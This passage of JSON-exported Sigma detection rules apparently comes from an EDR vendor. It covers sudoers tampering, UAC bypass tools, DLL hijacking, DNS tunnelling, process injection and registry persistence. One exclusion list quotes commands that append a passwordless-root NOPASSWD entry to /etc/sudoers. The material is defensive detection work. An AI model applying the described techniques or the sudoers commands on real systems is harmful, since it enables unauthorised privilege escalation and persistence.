"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.712525Z",
"creation_date": "2026-03-23T11:45:34.612480Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.612488Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://twitter.com/CraigHRowland/status/1580658905910108160/photo/1",
"https://attack.mitre.org/techniques/T1548/003/"
],
"name": "t1548_003_sudo_config_modified_linux.yml",
"content": "title: Sudo Configuration Modified (Linux)\nid: 2bb34ffc-2356-4191-b774-bc4fc82ee828\ndescription: |\n Detects a suspicious attempt to modify the content of '/etc/sudoers' or any file within '/etc/sudoers.d'.\n These files contain the configuration of the 'sudo' utility, used to give temporary privileges to an application.\n Their modification can be an attempt to elevate privileges.\n It is recommended to investigate the process responsible for this action for suspicious activities.\nreferences:\n - https://twitter.com/CraigHRowland/status/1580658905910108160/photo/1\n - https://attack.mitre.org/techniques/T1548/003/\ndate: 2022/10/27\nmodified: 2026/03/20\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.defense_evasion\n - attack.t1548.003\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.SystemModification\n - classification.Linux.Behavior.Persistence\n - classification.Linux.Behavior.PrivilegeEscalation\n - classification.Linux.Behavior.DefenseEvasion\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection:\n - Path:\n - '/etc/sudoers'\n - '/etc/sudoers.d/*'\n - TargetPath:\n - '/etc/sudoers'\n - '/etc/sudoers.d/*'\n\n filter_access_old:\n Kind: 'access'\n Permissions: 'read'\n\n filter_access_new:\n Kind:\n - 'read'\n - 'remove'\n - 'chmod'\n - 'chown'\n\n exclusion_dpkg:\n - ProcessImage: '/usr/bin/dpkg'\n - ProcessParentImage: '/usr/bin/dpkg'\n - ProcessGrandparentImage: '/usr/bin/dpkg'\n\n exclusion_dpkg_cmds:\n - ProcessCommandLine|contains:\n - '/usr/bin/dpkg-'\n - '/usr/sbin/dpkg-'\n - '/usr/bin/python* /usr/bin/reconfigure'\n - ProcessParentCommandLine|contains:\n - '/usr/bin/dpkg-'\n - '/usr/sbin/dpkg-'\n - ProcessGrandparentCommandLine|contains:\n - '/usr/bin/dpkg-'\n - '/usr/sbin/dpkg-'\n\n exclusion_apt:\n - ProcessImage: '/usr/bin/apt'\n - ProcessParentImage: '/usr/bin/apt'\n - ProcessGrandparentImage: '/usr/bin/apt'\n\n exclusion_yum:\n - 
ProcessCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessParentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n\n exclusion_dnf:\n ProcessCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf-automatic '\n - '/usr/bin/python? /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf '\n - '/usr/bin/python? /usr/bin/dnf '\n - '/usr/bin/python?.? /bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf '\n - '/usr/bin/python?.? 
/usr/bin/dnf-automatic'\n\n exclusion_rpm:\n - ProcessImage: '/usr/bin/rpm'\n - ProcessGrandparentImage: '/usr/bin/rpm'\n\n exclusion_pacman:\n ProcessImage: '/usr/bin/pacman'\n\n exclusion_puppet:\n - ProcessImage: '/opt/puppetlabs/puppet/bin/ruby'\n - ProcessParentImage: '/opt/puppetlabs/puppet/bin/ruby'\n - ProcessCommandLine|startswith: '/usr/bin/ruby /usr/bin/puppet'\n\n exclusion_docker:\n - ProcessImage:\n - '/usr/bin/dockerd'\n - '/usr/sbin/dockerd'\n - '/usr/bin/dockerd-current'\n - '/usr/sbin/dockerd-current'\n - '/usr/local/bin/dockerd'\n - '/snap/docker/*/bin/dockerd'\n - ProcessGrandparentImage: '/usr/bin/dockerd'\n - ProcessAncestors|contains: '|/usr/bin/dockerd|'\n\n exclusion_rootlesskit:\n # /home//bin/rootlesskit --state-dir=/run/user/1022/dockerd-rootless --net=slirp4netns --mtu=65520 --slirp4netns-sandbox=auto --slirp4netns-seccomp=auto --disable-host-loopback --port-driver=builtin --copy-up=/etc --copy-up=/run --propagation=rslave /home//bin/dockerd-rootless.sh\n - ProcessImage:\n - '/usr/bin/rootlesskit'\n - '/home/*/bin/rootlesskit'\n - '/home/*/.bin/rootlesskit'\n - ProcessParentImage:\n - '/usr/bin/rootlesskit'\n - '/home/*/bin/rootlesskit'\n - '/home/*/.bin/rootlesskit'\n\n exclusion_common:\n - ProcessImage:\n - '/usr/bin/rm'\n - '/bin/chmod'\n - '/usr/bin/chmod'\n - '/bin/chown'\n - '/usr/bin/chown'\n - '/kaniko/executor'\n - '/usr/lib/snapd/snap-update-ns'\n - '/usr/libexec/packagekitd'\n - '/usr/bin/podman'\n - '/usr/bin/touch'\n - '/usr/bin/dpkg-statoverride'\n - '/usr/sbin/cfagent'\n - '/usr/sbin/adsysd'\n - '/bin/busybox'\n - '/usr/bin/rsync'\n - '/usr/bin/dos2unix'\n - '/snap/snapd/*/usr/lib/snapd/snap-confine'\n - ProcessGrandparentImage:\n - '/kaniko/executor'\n - '/usr/bin/runc'\n - '/usr/bin/containerd-shim-runc-v2'\n - '/usr/bin/podman'\n\n # template_exclusion_ansible\n\n exclusion_salt:\n - ProcessCommandLine: '/usr/bin/python* /usr/bin/salt-minion'\n - ProcessImage: '/opt/saltstack/salt/bin/python?.??'\n\n 
exclusion_cloud-init:\n ProcessCommandLine|startswith: '/usr/bin/python? /usr/bin/cloud-init'\n\n exclusion_bitdefender:\n ProcessImage: '/opt/bitdefender-security-tools/bin/bdsecd'\n\n exclusion_sophos:\n ProcessParentImage: '/opt/sophos-av/engine/_/savd.?'\n\n exclusion_aws:\n ProcessParentImage: '/usr/bin/ssm-agent-worker'\n\n exclusion_rename:\n Kind: 'rename'\n ProcessImage:\n - '/usr/bin/vi'\n - '/usr/bin/vim'\n - '/usr/bin/vim.basic'\n TargetPath:\n - '/etc/sudoers~'\n - '/etc/sudoers.d/*~'\n\n exclusion_temp_file:\n - ProcessImage: '/usr/bin/sed'\n Path: '/etc/sed??????'\n - ProcessImage: '/usr/bin/sed'\n TargetPath: '/etc/sed??????'\n\n exclusion_cyberwatch:\n ProcessGrandparentCommandLine|contains:\n - '|| echo \"# cyberwatch privileges\" | sudo tee -a /etc/sudoers'\n - '|| echo \"Defaults:cyberwatch !requiretty\" | sudo tee -a /etc/sudoers'\n - '|| echo \"cyberwatch ALL=(ALL) NOPASSWD:ALL\" | sudo tee -a /etc/sudoers'\n\n exclusion_buildah:\n ProcessGrandparentImage: '/usr/bin/buildah'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2bb34ffc-2356-4191-b774-bc4fc82ee828",
"rule_name": "Sudo Configuration Modified (Linux)",
"rule_description": "Detects a suspicious attempt to modify the content of '/etc/sudoers' or any file within '/etc/sudoers.d'.\nThese files contain the configuration of the 'sudo' utility, used to give temporary privileges to an application.\nTheir modification can be an attempt to elevate privileges.\nIt is recommended to investigate the process responsible for this action for suspicious activities.\n",
"rule_creation_date": "2022-10-27",
"rule_modified_date": "2026-03-20",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2bbd2cab-7189-4801-aff8-def8972e59db",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.606241Z",
"creation_date": "2026-03-23T11:45:34.606245Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.606252Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/hfiref0x/UACME",
"https://attack.mitre.org/techniques/T1548/002/"
],
"name": "t1548_002_akagi.yml",
"content": "title: UACMe HackTool Executed\nid: 2bbd2cab-7189-4801-aff8-def8972e59db\ndescription: |\n Detects the execution of UACMe (Akagi) User Account Control bypass toolkit.\n UACMe is a well-known privilege escalation tool that contains multiple techniques to bypass Windows UAC protection mechanisms.\n It is frequently used by attackers after initial access to elevate privileges without triggering UAC prompts.\n It is recommended to investigate the process ancestry and any subsequent high-privilege process creations.\nreferences:\n - https://github.com/hfiref0x/UACME\n - https://attack.mitre.org/techniques/T1548/002/\ndate: 2021/10/27\nmodified: 2025/03/31\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.HackTool.UACMe\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName: 'Akagi.exe'\n InternalName: 'Akagi'\n\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2bbd2cab-7189-4801-aff8-def8972e59db",
"rule_name": "UACMe HackTool Executed",
"rule_description": "Detects the execution of UACMe (Akagi) User Account Control bypass toolkit.\nUACMe is a well-known privilege escalation tool that contains multiple techniques to bypass Windows UAC protection mechanisms.\nIt is frequently used by attackers after initial access to elevate privileges without triggering UAC prompts.\nIt is recommended to investigate the process ancestry and any subsequent high-privilege process creations.\n",
"rule_creation_date": "2021-10-27",
"rule_modified_date": "2025-03-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2bc7247d-de5a-436c-a772-bb81fb27eda8",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.609754Z",
"creation_date": "2026-03-23T11:45:34.609757Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.609765Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://medium.com/@boutnaru/the-windows-process-journey-runlegacycplelevated-exe-93f040f78c54",
"https://attack.mitre.org/techniques/T1548/002/"
],
"name": "t1548_002_runlegacycplelevated.yml",
"content": "title: RunLegacyCPLElevated Executed\nid: 2bc7247d-de5a-436c-a772-bb81fb27eda8\ndescription: |\n Detects the execution of RunLegacyCPLElevated.exe, a legitimate Windows binary used for running a legacy control panel applet in elevated mode.\n Adversaries may use RunLegacyCPLElevated to execute CPL file with high privileges.\n It is recommended to check child processes of RunLegacyCPLElevated for suspicious activities.\nreferences:\n - https://medium.com/@boutnaru/the-windows-process-journey-runlegacycplelevated-exe-93f040f78c54\n - https://attack.mitre.org/techniques/T1548/002/\ndate: 2025/03/10\nmodified: 2025/04/08\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.RunLegacyCPLElevated\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n - ProcessName: 'RunLegacyCPLElevated.EXE'\n - ProcessOriginalFileName: 'RunLegacyCPLElevated.EXE'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2bc7247d-de5a-436c-a772-bb81fb27eda8",
"rule_name": "RunLegacyCPLElevated Executed",
"rule_description": "Detects the execution of RunLegacyCPLElevated.exe, a legitimate Windows binary used for running a legacy control panel applet in elevated mode.\nAdversaries may use RunLegacyCPLElevated to execute a CPL file with high privileges.\nIt is recommended to check the child processes of RunLegacyCPLElevated for suspicious activities.\n",
"rule_creation_date": "2025-03-10",
"rule_modified_date": "2025-04-08",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2bdea909-ca39-4efc-bb11-094f0831e19b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.593230Z",
"creation_date": "2026-03-23T11:45:34.593234Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.593242Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_getmac.yml",
"content": "title: DLL Hijacking via getmac.exe\nid: 2bdea909-ca39-4efc-bb11-094f0831e19b\ndescription: |\n Detects potential Windows DLL Hijacking via getmac.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'getmac.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\fastprox.dll'\n - '\\framedynos.dll'\n - '\\mpr.dll'\n - '\\netutils.dll'\n - '\\srvcli.dll'\n - '\\SspiCli.dll'\n - '\\wbemprox.dll'\n - '\\wbemsvc.dll'\n - '\\wkscli.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: 
high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2bdea909-ca39-4efc-bb11-094f0831e19b",
"rule_name": "DLL Hijacking via getmac.exe",
"rule_description": "Detects potential Windows DLL Hijacking via getmac.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2c30d455-a333-49ed-82ac-70467657685d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.612914Z",
"creation_date": "2026-03-23T11:45:34.612918Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.612956Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://unit42.paloaltonetworks.com/dns-tunneling-how-dns-can-be-abused-by-malicious-actors/",
"https://attack.mitre.org/techniques/T1048/003/",
"https://attack.mitre.org/techniques/T1568/003/"
],
"name": "t1071_004_long_dns_request_linux.yml",
"content": "title: Abnormally Long DNS Name Resolved (Linux)\nid: 2c30d455-a333-49ed-82ac-70467657685d\ndescription: |\n Detects an abnormally long DNS query, usually associated with DNS tunneling.\n Adversaries may use DNS protocol to communicate with their C&C.\n It is recommended to check the content of the request and for suspicious behavior by the process making the request.\nreferences:\n - https://unit42.paloaltonetworks.com/dns-tunneling-how-dns-can-be-abused-by-malicious-actors/\n - https://attack.mitre.org/techniques/T1048/003/\n - https://attack.mitre.org/techniques/T1568/003/\ndate: 2024/09/26\nmodified: 2025/09/09\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1071.004\n - attack.exfiltration\n - attack.t1048.003\n - classification.Linux.Source.DnsQuery\n - classification.Linux.Behavior.CommandAndControl\nlogsource:\n product: linux\n category: dns_query\ndetection:\n selection:\n ProcessImage|contains: '?'\n QueryName|re: '[a-zA-Z0-9.-]{255}'\n\n exclusion_neterror:\n QueryName|startswith: 'about:neterror\\?e=redirectloop&u=https%3a//'\n\n exclusion_glpi:\n - ProcessImage: '/usr/bin/perl'\n ProcessCommandLine|contains: 'glpi-agent'\n - ProcessParentImage: '/usr/bin/perl'\n ProcessCommandLine|contains: 'glpi-agent'\n\n exclusion_nagios:\n ProcessParentImage: '/usr/sbin/nrpe'\n\n exclusion_puppet:\n ProcessParentImage: '/opt/puppetlabs/puppet/bin/ruby'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2c30d455-a333-49ed-82ac-70467657685d",
"rule_name": "Abnormally Long DNS Name Resolved (Linux)",
"rule_description": "Detects an abnormally long DNS query, usually associated with DNS tunneling.\nAdversaries may use the DNS protocol to communicate with their C&C.\nIt is recommended to check the content of the request and to look for suspicious behavior by the process making the request.\n",
"rule_creation_date": "2024-09-26",
"rule_modified_date": "2025-09-09",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1048.003",
"attack.t1071.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2c3aa5ca-f30f-4e2e-924d-43c8087144f4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.079552Z",
"creation_date": "2026-03-23T11:45:34.079554Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.079559Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://research.checkpoint.com/2023/rhadamanthys-v0-5-0-a-deep-dive-into-the-stealers-components/",
"https://attack.mitre.org/techniques/T1055/"
],
"name": "t1055_sacrificial_process_openwith.yml",
"content": "title: OpenWith.exe Sacrificial Process Spawned\nid: 2c3aa5ca-f30f-4e2e-924d-43c8087144f4\ndescription: |\n Detects the suspicious execution of the legitimate OpenWith.exe Windows binary, spawned without arguments. This can mean that the binary is being used as sacrificial process.\n Such processes are spawned and malicious code is immediately injected into them for nefarious purposes.\n This technique is used by Rhadamanthys, a malicious information stealer which is being distributed mostly via malicious Google advertisements.\n It is recommended to investigate the parent process performing this action and the destination IP address of the OpenWith.exe process to determine the legitimacy of this behavior.\nreferences:\n - https://research.checkpoint.com/2023/rhadamanthys-v0-5-0-a-deep-dive-into-the-stealers-components/\n - https://attack.mitre.org/techniques/T1055/\ndate: 2024/03/27\nmodified: 2025/08/25\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1055\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.SacrificialProcess\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n CommandLine: '?:\\Windows\\System32\\OpenWith.exe'\n\n filter_parent:\n ParentImage:\n - '?:\\Windows\\explorer.exe'\n - '?:\\Windows\\System32\\sihost.exe'\n\n exclusion_rpcnet:\n ProcessAncestors: '?:\\Windows\\SysWOW64\\svchost.exe|?:\\Windows\\SysWOW64\\rpcnet.exe|?:\\Windows\\System32\\services.exe|?:\\Windows\\System32\\wininit.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2c3aa5ca-f30f-4e2e-924d-43c8087144f4",
"rule_name": "OpenWith.exe Sacrificial Process Spawned",
"rule_description": "Detects the suspicious execution of the legitimate OpenWith.exe Windows binary, spawned without arguments. This can mean that the binary is being used as a sacrificial process.\nSuch processes are spawned and malicious code is immediately injected into them for nefarious purposes.\nThis technique is used by Rhadamanthys, a malicious information stealer which is being distributed mostly via malicious Google advertisements.\nIt is recommended to investigate the parent process performing this action and the destination IP address of the OpenWith.exe process to determine the legitimacy of this behavior.\n",
"rule_creation_date": "2024-03-27",
"rule_modified_date": "2025-08-25",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1055"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2c6b334b-a6f9-4041-8cdd-d91ebdaa6ba6",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.626477Z",
"creation_date": "2026-03-23T11:45:34.626479Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.626483Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://deceptiq.com/blog/ntuser-man-registry-persistence",
"https://attack.mitre.org/techniques/T1547/001/"
],
"name": "t1547_001_registry_mandatory_profile.yml",
"content": "title: User Registry Hive Hijacked via Mandatory Profile\nid: 2c6b334b-a6f9-4041-8cdd-d91ebdaa6ba6\ndescription: |\n Detects the creation or modification of an NTUSER.MAN file in a user profile directory.\n Attackers may plant a crafted NTUSER.MAN (mandatory user profile) file to load any registry keys into the user's HKCU hive at next logon without invoking registry APIs or triggering kernel registry callbacks, thus bypassing security solutions.\n It is recommended to validate whether the file creation is legitimate within your environment.\nreferences:\n - https://deceptiq.com/blog/ntuser-man-registry-persistence\n - https://attack.mitre.org/techniques/T1547/001/\ndate: 2026/01/08\nmodified: 2026/01/09\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1547.001\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: filesystem_event\ndetection:\n selection:\n - Path: '?:\\Users\\\\*\\NTUSER.MAN'\n Kind: 'create'\n - TargetPath: '?:\\Users\\\\*\\NTUSER.MAN'\n Kind: 'rename'\n\n exclusion_profsvc:\n ProcessCommandLine:\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s ProfSvc'\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p -s ProfSvc'\n - '?:\\windows\\system32\\svchost.exe -k netsvcs'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2c6b334b-a6f9-4041-8cdd-d91ebdaa6ba6",
"rule_name": "User Registry Hive Hijacked via Mandatory Profile",
"rule_description": "Detects the creation or modification of an NTUSER.MAN file in a user profile directory.\nAttackers may plant a crafted NTUSER.MAN (mandatory user profile) file to load any registry keys into the user's HKCU hive at next logon without invoking registry APIs or triggering kernel registry callbacks, thus bypassing security solutions.\nIt is recommended to validate whether the file creation is legitimate within your environment.\n",
"rule_creation_date": "2026-01-08",
"rule_modified_date": "2026-01-09",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1547.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2cacb51e-86d2-4851-9e44-b3544e02427f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
